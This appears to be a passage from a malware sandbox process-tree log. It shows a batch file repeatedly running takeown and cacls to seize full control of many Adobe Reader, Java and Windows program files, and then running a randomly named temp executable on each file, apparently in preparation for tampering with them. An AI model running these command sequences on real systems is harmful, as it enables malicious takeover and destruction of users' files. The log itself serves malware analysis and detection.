C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:1992
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:1536
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:1476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵
- Modifies file permissions
PID:1980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:1084
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:556
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:1224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:1424
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵
- Modifies file permissions
PID:968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "can.hyp" -nobanner3⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "can.hyp" -nobanner4⤵PID:1480
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:1848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "usa37.hyp" -nobanner3⤵PID:1028
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "usa37.hyp" -nobanner4⤵PID:1876
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:1260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:1756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:1536
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:1264
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:1836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:1916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵PID:1824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:1864
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:1908
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵PID:1568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "AdobeID.pdf" -nobanner3⤵PID:992
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "AdobeID.pdf" -nobanner4⤵PID:1228
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵PID:1068
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "classes.jsa" -nobanner3⤵PID:1424
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "classes.jsa" -nobanner4⤵PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:1224
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "directories.acrodata" -nobanner3⤵PID:832
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "directories.acrodata" -nobanner4⤵PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:1800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "overlay.png" -nobanner3⤵PID:1028
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "overlay.png" -nobanner4⤵PID:1876
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""2⤵PID:896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C3⤵PID:956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "PDIALOG.exe" -nobanner3⤵PID:1756
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "PDIALOG.exe" -nobanner4⤵PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""2⤵PID:780
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "Shorthand.jtp" -nobanner3⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "Shorthand.jtp" -nobanner4⤵PID:1704
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:1444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:1696
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:1568
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:1480
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:1864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵PID:1908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:556
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:816
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:396
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:1572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵
- Modifies file permissions
PID:1912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:1316
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:1820
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:1568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵PID:1144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "main.css" -nobanner3⤵PID:1676
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "main.css" -nobanner4⤵PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:560
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:1908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵
- Modifies file permissions
PID:1476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "review_shared.gif" -nobanner3⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "review_shared.gif" -nobanner4⤵PID:1756
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:1912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵PID:1256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:1704
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:1144
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:1676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵
- Modifies file permissions
PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:1480
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:432
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:1476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:1992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵PID:880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:1256
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵PID:204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:1380
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:676
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵PID:816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "can03.ths" -nobanner3⤵PID:1028
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "can03.ths" -nobanner4⤵PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵PID:880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:1696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵PID:1756
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵PID:1864
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:1264
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵PID:560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:1988
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:1260
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""2⤵PID:1480
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C3⤵PID:992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"3⤵
- Modifies file permissions
PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "CP1257.TXT" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "CP1257.TXT" -nobanner4⤵PID:1072
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""2⤵PID:1752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C3⤵PID:1800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "blank.jtp" -nobanner3⤵PID:956
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "blank.jtp" -nobanner4⤵PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""2⤵PID:1264
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C3⤵PID:952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "To_Do_List.jtp" -nobanner3⤵PID:1824
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "To_Do_List.jtp" -nobanner4⤵PID:972
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:816
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:1992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵
- Modifies file permissions
PID:828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c jigPt9cX.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:800
-
-
-
C:\Users\Admin\AppData\Local\Temp\jigPt9cX.exejigPt9cX.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\75YARYUT.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:1536
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:956
-
-
